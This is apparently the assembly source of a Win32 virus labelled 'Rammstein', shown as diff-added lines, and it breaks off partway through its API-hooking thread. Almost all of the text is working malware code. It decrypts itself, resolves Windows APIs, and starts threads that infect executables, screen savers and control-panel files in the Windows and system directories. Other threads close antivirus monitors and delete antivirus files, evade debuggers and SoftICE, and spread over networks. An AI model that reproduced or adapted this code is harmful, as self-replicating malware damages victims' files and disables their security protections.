+THREAD1SEH = TRUE ; +THREAD2SEH = TRUE ; +THREAD3SEH = TRUE ; +THREAD4SEH = FALSE ; +THREAD5SEH = FALSE ; +THREAD6SEH = TRUE ; +CHECKSUM = TRUE ; +WE_ARE_LAST = 0 ; +RELOCATIONS_LAST = 1 ; +RESOURCES_LAST = 2 ; +NOT_AVAILABLE = 0 ; +AVAILABLE = 1 ; +METHOD_MOVE_CODE = 0 ; +METHOD_APPEND_AT_END = 1 ; +METHOD_INCREASE_LAST = 2 ; +;陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 + ; +IF MMX ; +include mmx.inc ; MMX ! +ENDIF ; + ; +@endsz macro ;locate end of asciiz + local nextchar ;string + ; +nextchar: ; + lodsb ; + test al, al ; + jnz nextchar ; + endm ; + ; +include w32nt_lj.inc ; +include w32us_lj.inc ; + ; +; Credits to jp, vecna, prizzy ;calculate crc32 +mCRC32 equ 0C1A7F39Ah ; +mCRC32_init equ 09C3B248Eh ; +crc32 macro string ; + crcReg = mCRC32_init ; + irpc _x, ; + ctrlByte = '&_x&' xor (crcReg and 0FFh) + crcReg = crcReg shr 8 ; + rept 8 ; + ctrlByte = (ctrlByte shr 1) xor (mCRC32 * (ctrlByte and 1)) + endm ; + crcReg = crcReg xor ctrlByte ; + endm ; + dd crcReg ; +endm ; + ; +noter macro string ;this NOTs a string + irpc _x, ; + notbyte = not('&_x&') ; + db notbyte ; + endm ; + db not(0) ; +endm ; + ; +PUSH_POP STRUCT ; + pop_edi dd ? ;helps us to pop stuff... + pop_esi dd ? ; + pop_ebp dd ? ; + pop_esp dd ? ; + pop_ebx dd ? ; + pop_edx dd ? ; + pop_ecx dd ? ; + pop_eax dd ? ; +PUSH_POP ENDS ; + ; +;陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 + ; +.data ; +db 0 ; + ; +.code ; + ; +start: ; + IF DEBUG ; + jmp xxx ; +debug_start db 'Here is the start of the virus.',0 ;Really!! ;-) +xxx: ; + ENDIF ; + pushad ; +;陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 + call getdelta ; Get the delta handle + ; +getdelta: ; + pop ebp ; + sub ebp, offset getdelta ; + or ebp, ebp ;check if first gen + jnz no_first ; + mov [ebp+firstgen], 1 ;mark the first generation + jmp get_base ; + ; +no_first: ; + mov [ebp+firstgen], 0 ; + ; +get_base: ; + call getimagebase ; And the imagebase... + ; +getimagebase: ; + pop eax ; + ; +ourpoint: ; + sub eax, 1000h+(ourpoint-start)-1 ;before this eax equals + ;imagebase+RVA(ourpoint)+ + ;RVA(code section) + ; + mov dword ptr [ebp+imagebase], eax ; + mov dword ptr [ebp+ourimagebase], eax ; + jmp over_data ; + ; +imagebase dd 00400000h ; +ourimagebase dd 0 ; +firstgen dd 0 ; + ; +over_data: ; + cmp [ebp+firstgen], 1 ; + je EncryptedArea ; +;陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 + call DecryptOffset ;very light internal + ;decrypt module +DecryptOffset: ;no key, just ror/rol + pop esi ; + add esi, (EncryptedArea - DecryptOffset) ; + mov edi, esi ; + mov ecx, (end2-EncryptedArea) ; + ; +DecryptLoop: ; + lodsb ; + mov ebx, ecx ; + inc bl ; + jp parity ; + ror al, cl ; + jmp do_decrypt ; + ; +parity: ; + rol al, cl ; + ; +do_decrypt: ; + stosb ; + loop DecryptLoop ; +;陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 +EncryptedArea: ; + mov [ebp+delta], ebp ;save additional deltas + IF ANTIEMU ; + mov [ebp+delta2], ebp ; + ENDIF ; + mov eax, [ebp+imagebase] ; + mov dword ptr [ebp+adjust], eax ; +;陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 + lea eax, [ebp+ExceptionExit] ; Setup a SEH frame + push eax ; + push dword ptr fs:[0] ; + mov fs:[0], esp ; +;陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 + mov [ebp+copying], 0 ;reset our syncronization + mov [ebp+in_list], 0 ;variables + mov [ebp+free_routine], AVAILABLE ; + mov [ebp+crt_dir_flag], 3 ; + mov [ebp+apihookfinish], 0 ; + ; + lea esi, [ebp+module_names] ;decrypt module names + mov ecx, module_names_length ; + call not_list ; + ; + mov eax, [esp+28h] ;first let's locate the + lea edx, [ebp+kernel32_name] ;kernel32 base address + call LocateKernel32 ; + jc ReturnToHost ; + mov dword ptr [ebp+k32], eax ; + lea esi, dword ptr [ebp+kernel32apis] ; + lea edx, dword ptr [ebp+kernel32addr] ; + mov ecx, kernel32func ; + call LocateApis ;and kernel32 apis + jc ReturnToHost ; + ; + lea edi, dword ptr [ebp+advapi32_name] ;locate advapi32 + call LocateModuleBase ; + jc ReturnToHost ; + mov dword ptr [ebp+a32], eax ; + lea esi, dword ptr [ebp+advapi32apis] ; + lea edx, dword ptr [ebp+advapi32addr] ; + mov ecx, advapi32func ; + call LocateApis ;and the apis + jc ReturnToHost ; + ; + lea edi, dword ptr [ebp+user32_name] ;locate user32 + call LocateModuleBase ; + jc ReturnToHost ; + mov dword ptr [ebp+u32], eax ; + lea esi, dword ptr [ebp+user32apis] ; + lea edx, dword ptr [ebp+user32addr] ; + mov ecx, user32func ; + call LocateApis ;and it's apis + jc ReturnToHost ; + ; + lea edi, dword ptr [ebp+gdi32_name] ;locate gdi32 + call LocateModuleBase ; + jc ReturnToHost ; + mov dword ptr [ebp+g32], eax ; + lea esi, dword ptr [ebp+gdi32apis] ; + lea edx, dword ptr [ebp+gdi32addr] ; + mov ecx, gdi32func ; + call LocateApis ;and it's apis + jc ReturnToHost ; + ; + lea edi, dword ptr [ebp+mpr32_name] ;locate mpr32 + call LocateModuleBase ; + jc NoNetworkApis ; + mov dword ptr [ebp+m32], eax ; + lea esi, dword ptr [ebp+mpr32apis] ; + lea edx, dword ptr [ebp+mpr32addr] ; + mov ecx, mpr32func ; + call LocateApis ;and it's apis + jc NoNetworkApis ; + ; + mov [ebp+netapis], TRUE ; + jmp get_img ; + ; +NoNetworkApis: ; + mov [ebp+netapis], FALSE ; + ; +get_img: ; + lea edi, dword ptr [ebp+img32_name] ;locate and save + call LocateModuleBase ;the checksum procedure + jc no_image ; + call @checksum ; + db "CheckSumMappedFile", 0 ; +@checksum: ; + push eax ; + call [ebp+_GetProcAddress] ; + mov [ebp+checksumfile], eax ; + ; +no_image: ; + lea esi, [ebp+module_names] ;recrypt names + mov ecx, module_names_length ; + call not_list ; + ; + IF VIRUSNOTIFYENTRY ; + push 0 ; + call entrytext1 ; + db 'Rammstein viral code start!', 0 ; +entrytext1: ; + call entrytext2 ; + db 'Rammstein viral code start!', 0 ; +entrytext2: ; + push 0 ; + call [ebp+_MessageBoxA] ; + ENDIF ; +;陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 + call smash_dropper ;kill dropper + call getversion ;get the windoze version + ; +WindowsVersion OSVERSIONINFOA ; + ; +getversion: ; + call [ebp+_GetVersionExA] ; + mov byte ptr [ebp+version], al ; +;陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 + mov [ebp+skipper], 0 ; + IF MMX ; + pushfd ;push flags + pop eax ;get flags + bt eax, 21h ;test for mmx presence + jnc no_mmx_present ; + mov [ebp+mmx], TRUE ;set it! + jmp done_mmx ; + ; +no_mmx_present: ; + mov [ebp+mmx], FALSE ; + ; +done_mmx: ; + ENDIF ; + IF JUMP ;allocate some more + ; + cmp [ebp+method], METHOD_MOVE_CODE ;if code is not moved + jne restore_epo ;skip memory jump + ; + call [ebp+_VirtualAlloc], 0, virussize+1000h, MEM_COMMIT+MEM_RESERVE,\ + PAGE_EXECUTE_READWRITE + or eax, eax ;memory + jnz no_memory_error ; + ; + call fatalexit ;we cannot continue... + db "Not enough memory!", 0 ; + ; +fatalexit: ;if an error occurs, then + push 0 ;simulate a fatal exit + call [ebp+_FatalAppExitA] ; + ; +no_memory_error: ; + mov [ebp+memory], eax ;otherwise copy the + lea esi, [ebp+start] ;virus to memory and + mov edi, eax ; + mov ecx, virussize ; + rep movsb ; + add eax, offset resident_area - offset start; + push eax ; + ret ;continue there... + ; +restore_epo: ; + IF EPO ; + mov edi, [ebp+addressofentrypoint] ;restore epo + add edi, [ebp+imagebase] ; + lea esi, [ebp+saved_code] ; + lodsd ; + stosd ; + lodsd ; + stosd ; + ENDIF ; + ; +resident_area: ; + call getdelta2 ;get delta again... + ; +getdelta2: ; + pop ebp ; + sub ebp, offset getdelta2 ; + mov [ebp+delta], ebp ; + IF ANTIEMU ; + mov [ebp+delta2], ebp ; + ENDIF ; + ; + cmp [ebp+firstgen], 1 ; + je grunge ; + ; + cmp [ebp+method], METHOD_MOVE_CODE ;check the method + jne second_method ; + ; + mov esi, [ebp+codesource] ;if here, we must move + mov edi, [ebp+codedestin] ;some code back to where + add esi, [ebp+imagebase] ;it belongs... + add edi, [ebp+imagebase] ; + mov ecx, virussize ; + rep movsb ; + ; +second_method: ; + ; +grunge: ; + ENDIF ; + IF MAINTHREAD ;now we launch the main + lea ebx, [ebp+mainthreadid] ;thread + lea eax, [ebp+MainThread] ; + call [ebp+_CreateThread], 0, 0, eax, ebp, 0, ebx; + cmp [ebp+firstgen], 1 ;if it is the first gen + jne do_return ;than wait for it to + call [ebp+_WaitForSingleObject], eax, INFINITE ;finish + ; +do_return: ;otherwise, return to host + jmp ReturnToHost ;here... + ENDIF ; +;陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 +MainThread proc ; + call @MainThreadDelta ;for our main thread get +@MainThreadDelta: ;the delta handle again + pop ebp ; + sub ebp, offset @MainThreadDelta ; + ; + IF MAINTHREADSEH ; + lea eax, [ebp+MainExceptionExit] ; Setup a SEH frame + push eax ; + push dword ptr fs:[0] ; + mov fs:[0], esp ; + ; +no_main_seh: ; + ENDIF ; + lea edx, [ebp+OurThreads] ;Prepare to create the + lea ebx, [ebp+OurThreadIds] ;threads... + lea edi, [ebp+OurThreadHandles] ; + mov ecx, 6 ; + ; +create_loop: ; + mov eax, [edx] ; + add eax, ebp ; + call StartThread ;start them and set + add edx, 4 ;them + add ebx, 4 ; + add edi, 4 ; + loop create_loop ; + ; + cmp [ebp+no_imports], TRUE ; + jne no_per_process_skip ; + mov [ebp+skipper], 1 ; + ; +no_per_process_skip: ; + lea eax, [ebp+offset Semaphore] ;now prepare a semaphore + push eax ;to monitor their + push 31 ;execution + push 0 ; + push 0 ; + call [ebp+_CreateSemaphoreA] ; + mov [ebp+hsemaphore], eax ; + ; + lea edi, [ebp+OurThreadHandles] ;and now start them... + mov ecx, 6 ; + ; +resume_loop: ; + push ecx ; + push dword ptr [edi] ; + call [ebp+_ResumeThread] ;resume! + add edi, 4 ; + pop ecx ; + loop resume_loop ; + ; + push FALSE ;Wait forever until all + push INFINITE ;threads finish... + push TRUE ;(if the mainthread is + lea eax, [ebp+offset OurThreadHandles] ;TRUE, by this time the + push eax ;host is already running + push 6 ;in parallel with this + call [ebp+_WaitForMultipleObjectsEx] ;thread) + ; + lea eax, [ebp+test_semaphore] ;now get the last count + push eax ;of the semaphore... + push 1 ;Should be 6*5... + push [ebp+hsemaphore] ; + call [ebp+_ReleaseSemaphore] ; + ; + push [ebp+hsemaphore] ;close semaphore + call [ebp+_CloseHandle] ; + ; + mov eax, [ebp+test_semaphore] ;now get the value + mov ebx, offset where_to - offset jump ;calculate jump offset + sub ebx, 30 ;5*6 + add eax, ebx ;and make a jump with it + add eax, offset jump ;If the value is smaller + add eax, ebp ; +jump: jmp eax ;then it should + jmp jump ;mean someone fucked with + jmp jump ;our threads and probably + jmp jump ;the execution falls here + jmp jump ;where it hangs... This + jmp jump ;will give the user the + jmp jump ;impression that he played + jmp jump ;with hot stuff... + ; +where_to: ; + IF MAINTHREAD ;if we have a mainthread + db 0E9h ;we must kill it... + dd offset KillThread - $-4 ; + ELSE ; + db 0E9h ;otherwise, simply return + dd offset ReturnToHost - $-4 ;to host... + ENDIF ; +;陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 +StartThread: ; + pusha ;here we create threads + call [ebp+_CreateThread], 0, 0, eax, ebp, CREATE_SUSPENDED, ebx + mov [edi], eax ; + push THREAD_PRIORITY_HIGHEST ;and set their priority + push dword ptr [ebx] ; + call [ebp+_SetThreadPriority] ; + popa ; + db 0c3h ;ret + ret ; +;陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 +OurThreadIds: ; +Thread_1_id dd 0 ;Direct infector +Thread_2_id dd 0 ;Directory infector +Thread_3_id dd 0 ;AV killed +Thread_4_id dd 0 ;Anti-debugging +Thread_5_id dd 0 ;Api hooker +Thread_6_id dd 0 ;Network infector + ; +OurThreadHandles: ; +Thread_1_handle dd 0 ; +Thread_2_handle dd 0 ; +Thread_3_handle dd 0 ; +Thread_4_handle dd 0 ; +Thread_5_handle dd 0 ; +Thread_6_handle dd 0 ; +hsemaphore dd 0 ; +;陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 +; This Thread is the direct infector thread +;陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 +Thread_1_StartAddress proc PASCAL tdelta: dword ; + call @Thread1Delta ;I have been experiencing +@Thread1Delta: ;problems with delta pass + pop ebp ;via the parameter so I + sub ebp, offset @Thread1Delta ;decided to read it again + ; + IF THREAD1SEH ; + lea eax, [ebp+Thread1Exception] ; Setup a SEH frame + push eax ; + push dword ptr fs:[0] ; + mov fs:[0], esp ; + ENDIF ; + ; + IF DIRECT ; + lea esi, [ebp+offset direct_list] ;point file names in the + mov ecx, direct_list_len ;Windows directory and + call not_list ;restore names... + ; + push 260d ; + call windir ;get the Windows dir. +name_ db 260d dup (0) ; + ; +windir: ; + call [ebp+_GetWindowsDirectoryA] ; + lea edi, [ebp+name_] ;point the dir path + xchg eax, edx ; + lea esi, [ebp+direct_list] ;point names + inc esi ; + inc esi ; + ; +direct_loop: ; + mov word ptr [edi+edx], 005Ch ;mark terminator slash + cmp byte ptr [esi], 0FFh ;was last name? + je direct_end ; + call [ebp+_lstrcat], edi, esi ;concatenate stringz + lea eax, [ebp+W32FD] ;pointer to find data + call [ebp+_FindFirstFileA], edi, eax ;find file + cmp eax, INVALID_HANDLE_VALUE ;none? + je next_direct ; + ; + push edi ; + lea edi, [edi.WFD_cFileName] ; +@001: cmp [ebp+free_routine], NOT_AVAILABLE ; + je @001 ; + mov [ebp+free_routine], NOT_AVAILABLE ; + call InfectFile ;Infect it!! + pop edi ; + mov [ebp+free_routine], AVAILABLE ; + ; +next_direct: ; + @endsz ;go to end of string + jmp direct_loop ;and do it again... + ENDIF ; + ; +direct_end: ; + lea esi, [ebp+offset direct_list] ;point names again and + mov ecx, direct_list_len ;restore encryption + call not_list ; + ; + IF THREAD1SEH ; + jmp restore_thread1_seh ;host + ; +Thread1Exception: ;if we had an error we + mov esp, [esp+8] ;must restore the ESP + call DeltaRecover1 ; +DeltaRecover1: ; + pop ebp ; + sub ebp, offset DeltaRecover1 ; + ; +restore_thread1_seh: ; + pop dword ptr fs:[0] ;and restore the SEH + add esp, 4 ; + ENDIF ; + ; + push 0 ; + push 5 ; + push [ebp+hsemaphore] ; + call [ebp+_ReleaseSemaphore] ;release the semaphore + call [ebp+_ExitThread], 0 ; +Thread_1_StartAddress endp ; + ; +direct_list: ;the direct action list + IF DEBUG ;if debug is on only + noter ; + noter ;goat files will be + ELSE ;infected... + noter ; + noter ; Like CD music? + noter ; Like to write stuff? + noter ; Like to write better? + noter ; Like to calculate? + noter ; Fear the errors? + noter ; Like to extract? + noter ; Like mpegs? + noter ; Like stupid games? + noter ; And more stupid games? + noter ; And still more stupid? + noter ; Like to adjust yer vol? + noter ; Are you using help? + ENDIF ; Well... TO BAD !!!! ;-) +direct_list_len = $ - offset direct_list ; + db 0FFh ; +;陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 +; This Thread is the directory infector thread +;陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 +Thread_2_StartAddress proc PASCAL tdelta: dword ; + call @Thread2Delta ; +@Thread2Delta: ; + pop ebp ; + sub ebp, offset @Thread2Delta ; + ; + IF THREAD2SEH ; + lea eax, [ebp+Thread2Exception] ; Setup a SEH frame + push eax ; + push dword ptr fs:[0] ; + mov fs:[0], esp ; + ENDIF ; + ; + push 0 ;Get the drive type. If + call [ebp+_GetDriveTypeA] ;it is a fixed drive + sub [ebp+crt_dir_flag], eax ;than this value = 0 + ; + push 260 ;Get Windows directory + call @1 ; +wdir db 260 dup(0) ; +@1: call [ebp+_GetWindowsDirectoryA] ; + ; + push 260 ;Get System directory + call @2 ; +sysdir db 260 dup(0) ; +@2: call [ebp+_GetSystemDirectoryA] ; + ; + call @3 ;Get current directory +crtdir db 260 dup(0) ; +@3: push 260 ; + call [ebp+_GetCurrentDirectoryA] ; + ; + cmp dword ptr [ebp+crt_dir_flag], 0 ;are we on a fixed disk? + jne direct_to_windows ; + ; + mov dword ptr [ebp+infections], 0FFFFh ;infect all files there + call Infect_Directory ; + ; +direct_to_windows: ; + cmp [ebp+firstgen], 1 ; + je back_to_current_dir ; + ; + lea eax, [ebp+offset wdir] ;Change to Windows dir. + push eax ; + call [ebp+_SetCurrentDirectoryA] ; + ; + mov dword ptr [ebp+infections], 3 ;infect 3 files there + call Infect_Directory ; + ; + lea eax, [ebp+offset sysdir] ;Change to System dir. + push eax ; + call [ebp+_SetCurrentDirectoryA] ; + ; + mov dword ptr [ebp+infections], 3 ;infect 3 files there + call Infect_Directory ; + ; +back_to_current_dir: ; + lea eax, [ebp+offset crtdir] ;Change back to crt dir. + push eax ; + call [ebp+_SetCurrentDirectoryA] ; + ; + IF THREAD2SEH ; + jmp restore_thread2_seh ;host + ; +Thread2Exception: ;if we had an error we + mov esp, [esp+8] ;must restore the ESP + call DeltaRecover2 ; +DeltaRecover2: ; + pop ebp ; + sub ebp, offset DeltaRecover2 ; + ; +restore_thread2_seh: ; + pop dword ptr fs:[0] ;and restore the SEH + add esp, 4 ; + ENDIF ; + ; + push 0 ; + push 5 ; + push [ebp+hsemaphore] ; + call [ebp+_ReleaseSemaphore] ; + call [ebp+_ExitThread], 0 ; +infections dd 0 ; +crt_dir_flag dd 3 ; + ; +Infect_Directory proc ;directory scanner + pusha ; + lea esi, [ebp+file_extensions] ;restore filenames + mov ecx, file_extensions_len ; + call not_list ; + inc esi ; + inc esi ; + ; +find_first_file: ; + cmp byte ptr [esi], 0FFh ;last? + je done_directory ; + lea edi, [ebp+offset W32FD] ;find first!! + call [ebp+_FindFirstFileA], esi, edi ; + mov edx, eax ; + ; +compare_result: ; + cmp eax, INVALID_HANDLE_VALUE ; + je next_extension ; + or eax, eax ; + je next_extension ; + push edi ; + lea edi, [edi.WFD_cFileName] ;point name... +@002: cmp [ebp+free_routine], NOT_AVAILABLE ;syncronize!!! + je @002 ; + mov [ebp+free_routine], NOT_AVAILABLE ; + call InfectFile ;infect it! + mov [ebp+free_routine], AVAILABLE ; + pop edi ; + jc find_next_file ; + dec [ebp+infections] ; + cmp [ebp+infections], 0 ; + jz done_directory ; + ; +find_next_file: ; + push edx ; + call [ebp+_FindNextFileA], edx, edi ;find next + pop edx ; + jmp compare_result ; + ; +next_extension: ; + @endsz ; + jmp find_first_file ; + ; +done_directory: ; + lea esi, [ebp+file_extensions] ;recrypt the extenstions + mov ecx, file_extensions_len ; + call not_list ; + popa ; + ret ; +Infect_Directory endp ; + ; +file_extensions: ;the list with valid + IF DEBUG ; + noter ; + noter ;extensions + noter ; + noter ; + noter ; + noter ; + noter ; + noter ; + noter ; + noter ; + noter ; + noter ; + noter ; + noter ; + noter ; + noter ; + ELSE ;extensions + noter ; + noter <*.EXE> ;normal exe + noter <*.COM> ;same + noter <*.ACM> ; + noter <*.CPL> ;control panel object + noter <*.HDI> ;heidi file + noter <*.OCX> ;windowz ocx + noter <*.PCI> ; + noter <*.QTC> ; + noter <*.SCR> ;screen saver + noter <*.X32> ; + noter <*.CNV> ; + noter <*.FMT> ; + noter <*.OCM> ; + noter <*.OLB> ; + noter <*.WPC> ; + ENDIF ; +file_extensions_len = $-offset file_extensions ; + db 0FFh ; +Thread_2_StartAddress endp ; +;陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 +; This Thread is the AV monitors and checksums killer thread +;陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 +Thread_3_StartAddress proc PASCAL tdelta: dword ; + call @Thread3Delta ; +@Thread3Delta: ; + pop ebp ; + sub ebp, offset @Thread3Delta ; + ; + IF THREAD3SEH ; + lea eax, [ebp+Thread3Exception] ; Setup a SEH frame + push eax ; + push dword ptr fs:[0] ; + mov fs:[0], esp ; + ENDIF ; + ; + IF ANTIAV ; + lea esi, [ebp+av_monitors] ;First kill some monitors + mov ecx, monitors_nr ; + ; +LocateMonitors: ; + push ecx ; + call [ebp+_FindWindowA], 0, esi ; + xchg eax, ecx ; + jecxz get_next_monitor ; + call [ebp+_PostMessageA], ecx, WM_ENDSESSION, 0, 0 + ; +get_next_monitor: ; + @endsz ; + pop ecx ; + loop LocateMonitors ; + ; + lea esi, [ebp+offset av_list] ;point av files list + mov ecx, av_list_len ;and + call not_list ;restore names... + inc esi ; + inc esi ; + lea edi, [ebp+offset searchfiles] ;point to Search Record + ; +locate_next_av: ; + mov eax, esi ; + cmp byte ptr [eax], 0FFh ;is this the end? + je av_kill_done ; + push edi ;push search rec. address + push eax ;push filename address + call [ebp+_FindFirstFileA] ;find first match + inc eax ; + jz next_av_file ; + dec eax ; + push eax ; + lea ebx, [edi.WFD_cFileName] ;ESI = ptr to filename + push 80h ; + push ebx ; + call [ebp+_SetFileAttributesA] ; + push ebx ;push filename address + call [ebp+_DeleteFileA] ;delete file! + ; + call [ebp+_FindClose] ;close the find handle + ; +next_av_file: ; + @endsz ; + jmp locate_next_av ; + ; +av_kill_done: ; + lea esi, [ebp+offset av_list] ;point av files list + mov ecx, av_list_len ; + call not_list ;hide names... + ENDIF ; + ; + IF THREAD3SEH ; + jmp restore_thread3_seh ;host + ; +Thread3Exception: ;if we had an error we + mov esp, [esp+8] ;must restore the ESP + call DeltaRecover3 ; +DeltaRecover3: ; + pop ebp ; + sub ebp, offset DeltaRecover3 ; + ; +restore_thread3_seh: ; + pop dword ptr fs:[0] ;and restore the SEH + add esp, 4 ; + ENDIF ; + ; + push 0 ; + push 5 ; + push [ebp+hsemaphore] ; + call [ebp+_ReleaseSemaphore] ; + call [ebp+_ExitThread], 0 ; +Thread_3_StartAddress endp ; +av_monitors label ; + db 'AVP Monitor', 0 ; + db 'Amon Antivirus Monitor', 0 ; +monitors_nr = 2 ; + ; +searchfiles WIN32_FIND_DATA ; + ; +av_list label ; + noter ; + noter ;the av files to kill + noter ; + noter ; + noter ; + noter ; + noter ; + noter ; + noter ; + noter ; + noter ; + noter ; + noter ; + noter ; +av_list_len = $ - offset av_list ; + db 0FFh ; +;陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 +; This Thread is the anti-debugging and anti-emulation thread +;陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 +Thread_4_StartAddress proc PASCAL tdelta: dword ; + call @Thread4Delta ; +@Thread4Delta: ; + pop ebp ; + sub ebp, offset @Thread4Delta ; + ; + IF THREAD4SEH ; + lea eax, [ebp+Thread4Exception] ; Setup a SEH frame + push eax ; + push dword ptr fs:[0] ; + mov fs:[0], esp ; + ENDIF ; + ; + IF ANTIEMU ; + lea eax, [ebp+DebuggerKill] ;antidebugging stuffs. + push eax ;Here we set up a new + xor ebx, ebx ;seh frame and then we + push dword ptr fs:[ebx] ;make an exception error + mov fs:[ebx], esp ;occur. + dec dword ptr [ebx] ;TD stops here if in + ;default mode. + jmp shut_down ; + ; +DebuggerKill: ; + mov esp, [esp+8] ;the execution goes here + pop dword ptr fs:[0] ; + add esp, 4 ; + ; + db 0BDh ;delta gets lost so we +delta2 dd 0 ;must restore it... + ; + call @7 ;here we try to retrieve + db 'IsDebuggerPresent', 0 ;IsDebuggerPresent API +@7: push [ebp+k32] ;if we fail it means we + call [ebp+_GetProcAddress] ;don't have this api + or eax, eax ;(Windows95) + jz continue_antiemu ; + ; + call eax ;Let's check if our + or eax, eax ;process is being + jne shut_down ;debugged. + ; + mov ecx, fs:[20h] ; ECX = Context of debugger + jecxz softice ; If ECX<>0, we're debugged + jmp shut_down ; + ; +softice: ; + lea edi, [ebp+SoftIce1] ;try to see if we are + call detect_softice ;being debugged by + jc shut_down ;softice + lea edi, [ebp+SoftIce1] ; + call detect_softice ; + jc shut_down ; + jmp nod_ice ; + ; +detect_softice: ; + xor eax, eax ; + push eax ; + push 00000080h ; + push 00000003h ; + push eax ; + inc eax ; + push eax ; + push 80000000h or 40000000h ; + push edi ; + call [ebp+_CreateFileA] ; + ; + inc eax ; + jz cantcreate ; + dec eax ; + ; + push eax ; + call [ebp+_CloseHandle] ; + stc ; + db 0c3h ; + ; +cantcreate: ; + clc ; + db 0c3h ; + ; +nod_ice: ; + cmp byte ptr [ebp+version], 4 ;can we use debug regs? + jae cannot_kill_debug ; + ; + lea esi, [ebp+drs] ;Debug Registers opcodes + mov ecx, 7 ;7 registers + lea edi, [ebp+bait] ;point the opcode place + ; +repp: ; + lodsb ;take the opcode + mov byte ptr [edi], al ;generate instruction + call zapp ;call it! + loop repp ;do it again + jmp compute_now ; + ; +zapp: ; + xor eax, eax ;eax = 0 + dw 230fh ;to mov DRx, eax +bait label ; + db 0 ; + db 0C3h ; + ; +drs db 0c0h, 0c8h, 0d0h, 0d8h, 0e8h, 0f0h, 0f8h ;debug registers opcodes + ; +compute_now: ; + mov eax, dr0 ; + cmp eax, 0 ; + jne shut_down ; + ; +cannot_kill_debug: ; + IF MMX ; + cmp [ebp+mmx], TRUE ; + jne no_mmx_here ; + mov ecx, 6666h ;do some loops + mov eax, 1111h ;very lite mmx_usage +; movd1 mm1, esi ; +; movd1 eax, mm1 ; +; cmp eax, esi ; +; jne shut_down ; + ENDIF ; + ; +no_mmx_here: ; + mov ebx, esp ;or by nod ice and + push cs ;others... + pop eax ; + cmp esp, ebx ; + jne shut_down ; + jmp continue_antiemu ; + ; +shut_down: ; + IF DEBUG ; + call [ebp+_MessageBoxA], 0, offset debug, offset debug, 0 + ENDIF ; + push 0 ;If so, close down!! + call [ebp+_ExitProcess] ;close + IF DEBUG ; + debug db 'Shut down by anti-emulator', 0 ; + ENDIF ; +continue_antiemu: ; + ELSE ; + ENDIF ; + ; + IF THREAD4SEH ; + jmp restore_thread4_seh ;host + ; +Thread4Exception: ;if we had an error we + mov esp, [esp+8] ;must restore the ESP + call DeltaRecover4 ; +DeltaRecover4: ; + pop ebp ; + sub ebp, offset DeltaRecover4 ; + ; +restore_thread4_seh: ; + pop dword ptr fs:[0] ;and restore the SEH + add esp, 4 ; + ENDIF ; + ; + push 0 ; + push 5 ; + push [ebp+hsemaphore] ; + call [ebp+_ReleaseSemaphore] ; + call [ebp+_ExitThread], 0 ; + ; +SoftIce1 db "\\.\SICE",0 ; +SoftIce2 db "\\.\NTICE",0 ; +Thread_4_StartAddress endp ; +;陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 +; This Thread is the API hooker thread +;陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 +Thread_5_StartAddress proc PASCAL tdelta: dword ; + call @Thread5Delta ; +@Thread5Delta: ; + pop ebp ; + sub ebp, offset @Thread5Delta ; + ; + IF THREAD5SEH ; + lea eax, [ebp+Thread5Exception] ; Setup a SEH frame + push eax ; + push dword ptr fs:[0] ; + mov fs:[0], esp ; + ENDIF ; + ; + cmp [ebp+skipper], 1 ; + je error ; + ; + IF APIHOOK ; + cmp [ebp+firstgen], 1 ;don't hook gen0 + je error ; + mov ebx, dword ptr [ebp+ourimagebase] ; now put imagebase in ebx + mov esi, ebx ; + mov ax, word ptr [esi] ; + xor 